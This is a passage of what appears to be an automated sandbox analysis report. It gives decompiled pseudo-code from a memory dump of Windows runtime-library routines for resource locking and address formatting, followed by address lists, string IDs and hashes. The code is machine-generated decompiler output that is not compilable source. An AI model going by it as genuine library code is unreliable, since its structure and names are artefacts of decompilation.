                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                      						goto L6;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags = _t115 | 0xffffffff;
                                                                                                                                                      						asm("lock xadd [eax], edx");
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L6:
                                                                                                                                                      					_push(_t128);
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L7:
                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                      						if(_t115 >= 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _a8;
                                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							return 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                      							_t49 = _t96 + 0x1c;
                                                                                                                                                      							_t106 = 1;
                                                                                                                                                      							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0099217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0099217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00963F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00935384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00935329(_t110, _t138);
																_t69 = E009353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
                                                                                                                                                      													if(0 != 0) {
                                                                                                                                                      														continue;
                                                                                                                                                      													} else {
                                                                                                                                                      														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                      														return 1;
                                                                                                                                                      													}
                                                                                                                                                      													goto L59;
                                                                                                                                                      												}
                                                                                                                                                      												continue;
                                                                                                                                                      											} else {
                                                                                                                                                      												goto L40;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										goto L59;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = 0;
                                                                                                                                                      									return 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t115 =  *(_t96 + 0x28);
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t106 =  *_t49;
                                                                                                                                                      								__eflags = _t106;
                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t93 = _t106;
                                                                                                                                                      										asm("lock cmpxchg [edi], esi");
                                                                                                                                                      										__eflags = _t93 - _t106;
                                                                                                                                                      										if(_t93 == _t106) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_t106 = _t93;
                                                                                                                                                      										__eflags = _t93;
                                                                                                                                                      										if(_t93 > 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t106;
                                                                                                                                                      								}
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L23;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L59;
                                                                                                                                                      					}
                                                                                                                                                      					_t84 = _t115;
                                                                                                                                                      					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                      					__eflags = _t84 - _t115;
                                                                                                                                                      					if(_t84 != _t115) {
                                                                                                                                                      						_t115 = _t84;
                                                                                                                                                      						goto L7;
                                                                                                                                                      					} else {
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L59:
                                                                                                                                                      			}




































                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972369
                                                                                                                                                      0x0097236a
                                                                                                                                                      0x0097236c
                                                                                                                                                      0x00972371
                                                                                                                                                      0x00972373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972379
                                                                                                                                                      0x00972379
                                                                                                                                                      0x0097237a
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x00972385
                                                                                                                                                      0x00972386
                                                                                                                                                      0x00972389
                                                                                                                                                      0x0097238e
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00935378
                                                                                                                                                      0x0093537c
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972397
                                                                                                                                                      0x0097239c
                                                                                                                                                      0x009723a2
                                                                                                                                                      0x009723a3
                                                                                                                                                      0x009723a6
                                                                                                                                                      0x009723ab
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b4
                                                                                                                                                      0x009723b9
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723bc
                                                                                                                                                      0x009723bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969153
                                                                                                                                                      0x00969158
                                                                                                                                                      0x0096915a
                                                                                                                                                      0x0096915e
                                                                                                                                                      0x00969160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969171
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969160
                                                                                                                                                      0x009723c6
                                                                                                                                                      0x009723ce
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00972373
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972293
                                                                                                                                                      0x00972295
                                                                                                                                                      0x0097229a
                                                                                                                                                      0x009722a1
                                                                                                                                                      0x009722a3
                                                                                                                                                      0x009722a7
                                                                                                                                                      0x009722a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722ab
                                                                                                                                                      0x009722ad
                                                                                                                                                      0x009722af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722af
                                                                                                                                                      0x009722b1
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353cb
                                                                                                                                                      0x009353ce
                                                                                                                                                      0x009353d0
                                                                                                                                                      0x009353d4
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353d8
                                                                                                                                                      0x009353e3
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097228f
                                                                                                                                                      0x00972349
                                                                                                                                                      0x0097234d
                                                                                                                                                      0x00972251
                                                                                                                                                      0x00972251
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972251
                                                                                                                                                      0x009721a4
                                                                                                                                                      0x009721a4
                                                                                                                                                      0x009721a6
                                                                                                                                                      0x009721a8
                                                                                                                                                      0x009721ac
                                                                                                                                                      0x009721b6
                                                                                                                                                      0x009721b8
                                                                                                                                                      0x009721bc
                                                                                                                                                      0x009721be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c0
                                                                                                                                                      0x009721c2
                                                                                                                                                      0x009721c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c4
                                                                                                                                                      0x009721c6
                                                                                                                                                      0x009721c6
                                                                                                                                                      0x009721c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009721c8
                                                                                                                                                      0x009721a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972183
                                                                                                                                                      0x0095057b
                                                                                                                                                      0x0095057d
                                                                                                                                                      0x00950581
                                                                                                                                                      0x00950583
                                                                                                                                                      0x00972178
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00950589
                                                                                                                                                      0x0095058f
                                                                                                                                                      0x0095058f
                                                                                                                                                      0x00950583
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-4236105082
                                                                                                                                                      • Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                                                                                                                      • Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
                                                                                                                                                      • Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                                                                                                                      • Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v10;
                                                                                                                                                      				char _v140;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t24;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				intOrPtr _t45;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __edx;
                                                                                                                                                      				_t24 =  *0x9f2088; // 0x774e5599
                                                                                                                                                      				_v8 = _t24 ^ _t57;
                                                                                                                                                      				_t45 = _a16;
                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                      				_t52 = _a20;
                                                                                                                                                      				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_t26 = 0xc000000d;
                                                                                                                                                      				} else {
                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                      						if( *_t52 == _t45) {
                                                                                                                                                      							goto L3;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						L3:
                                                                                                                                                      						_t28 =  &_v140;
                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                      							_push("[");
                                                                                                                                                      							_push(0x41);
                                                                                                                                                      							_push( &_v140);
                                                                                                                                                      							_t29 = E00947707();
                                                                                                                                                      							_t58 = _t58 + 0xc;
                                                                                                                                                      							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                      						}
                                                                                                                                                      						_t54 = E009513CB(_t53, _t28);
                                                                                                                                                      						if(_a8 != 0) {
                                                                                                                                                      							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                      							_t58 = _t58 + 0x10;
                                                                                                                                                      							_t54 = _t54 + _t34 * 2;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                      							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                      							_t58 = _t58 + 0x10;
                                                                                                                                                      							_t54 = _t54 + _t40 * 2;
                                                                                                                                                      						}
                                                                                                                                                      						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                      						 *_t52 = _t53;
                                                                                                                                                      						if( *_t52 < _t53) {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						} else {
                                                                                                                                                      							E00912340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                      							_t26 = 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                      			}





















                                                                                                                                                      APIs
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 0097EA22
                                                                                                                                                        • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                                                                                                                        • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 0095156D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                      • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                                                                                                                      • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                                                                                                                      • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                                                                                                                      • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E009353A5(signed int _a4, char _a8) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t37;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				signed int _t42;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				intOrPtr _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				signed int _t64;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				intOrPtr _t78;
                                                                                                                                                      				signed int* _t79;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      				signed int _t92;
                                                                                                                                                      				void* _t104;
                                                                                                                                                      				void* _t105;
                                                                                                                                                      
                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                      				_t32 =  *(_t64 + 0x28);
                                                                                                                                                      				_t71 = _t64 + 0x28;
                                                                                                                                                      				_push(_t92);
                                                                                                                                                      				if(_t32 < 0) {
                                                                                                                                                      					_t78 =  *[fs:0x18];
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                      					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                      						goto L3;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags = _t32 | 0xffffffff;
                                                                                                                                                      						asm("lock xadd [ecx], eax");
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L3:
                                                                                                                                                      					_push(_t86);
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L4:
                                                                                                                                                      						__eflags = _t32;
                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _a8;
                                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							return 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                      							_t79 = _t64 + 0x24;
                                                                                                                                                      							_t71 = 1;
                                                                                                                                                      							asm("lock xadd [eax], ecx");
                                                                                                                                                      							_t32 =  *(_t64 + 0x28);
                                                                                                                                                      							_a4 = _t32;
                                                                                                                                                      							__eflags = _t32;
                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                      								L19:
                                                                                                                                                      								_t86 = 0;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                      									asm("sbb esi, esi");
                                                                                                                                                      									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
                                                                                                                                                      									_push(_t92);
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                      									__eflags = _t37 - 0x102;
                                                                                                                                                      									if(_t37 != 0x102) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t71 =  *(_t92 + 4);
                                                                                                                                                      									_t85 =  *_t92;
                                                                                                                                                      									_t51 = E00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                      									_push(_t85);
                                                                                                                                                      									_push(_t51);
                                                                                                                                                      									E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                      									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                      									_t86 = _t86 + 1;
                                                                                                                                                      									_t105 = _t104 + 0x28;
                                                                                                                                                      									__eflags = _t86 - 2;
                                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                                      										E0099217A(_t71, __eflags, _t64);
                                                                                                                                                      									}
                                                                                                                                                      									_push("RTL: Re-Waiting\n");
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_push(0x65);
                                                                                                                                                      									E00963F92();
                                                                                                                                                      									_t104 = _t105 + 0xc;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t37;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									_push(_t37);
                                                                                                                                                      									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                      									asm("int3");
                                                                                                                                                      									_t40 =  *_t71;
                                                                                                                                                      									 *_t71 = 0;
                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                      										L1:
                                                                                                                                                      										_t42 = E00935384(_t92 + 0x24);
                                                                                                                                                      										if(_t42 != 0) {
                                                                                                                                                      											goto L31;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L2;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                      										_push( &_a4);
                                                                                                                                                      										_push(_t40);
                                                                                                                                                      										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                      										__eflags = _t49;
                                                                                                                                                      										if(__eflags >= 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										} else {
                                                                                                                                                      											_push(_t49);
                                                                                                                                                      											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                      											L31:
                                                                                                                                                      											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                      											_push( &_a4);
                                                                                                                                                      											_push(1);
                                                                                                                                                      											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                      											__eflags = _t42;
                                                                                                                                                      											if(__eflags >= 0) {
                                                                                                                                                      												L2:
                                                                                                                                                      												return _t42;
                                                                                                                                                      											} else {
                                                                                                                                                      												_push(_t42);
                                                                                                                                                      												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                      												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                      												_push( &_a4);
                                                                                                                                                      												_push(1);
                                                                                                                                                      												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                      												__eflags = _t42;
                                                                                                                                                      												if(__eflags >= 0) {
                                                                                                                                                      													goto L2;
                                                                                                                                                      												} else {
                                                                                                                                                      													_push(_t42);
                                                                                                                                                      													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                      													asm("int3");
                                                                                                                                                      													while(1) {
                                                                                                                                                      														_t74 = _t45;
                                                                                                                                                      														__eflags = _t45 - 1;
                                                                                                                                                      														if(_t45 != 1) {
                                                                                                                                                      															break;
                                                                                                                                                      														}
                                                                                                                                                      														_t86 = _t86 | 0xffffffff;
                                                                                                                                                      														_t45 = _t74;
                                                                                                                                                      														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                      														__eflags = _t45 - _t74;
                                                                                                                                                      														if(_t45 != _t74) {
                                                                                                                                                      															continue;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t46 =  *[fs:0x18];
                                                                                                                                                      															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                      															return _t46;
                                                                                                                                                      														}
                                                                                                                                                      														goto L38;
                                                                                                                                                      													}
                                                                                                                                                      													E00935329(_t74, _t92);
                                                                                                                                                      													_push(1);
                                                                                                                                                      													_t48 = E009353A5(_t92);
                                                                                                                                                      													return _t48;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_t32 =  *(_t64 + 0x28);
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t71 =  *_t79;
                                                                                                                                                      								__eflags = _t71;
                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t57 = _t71;
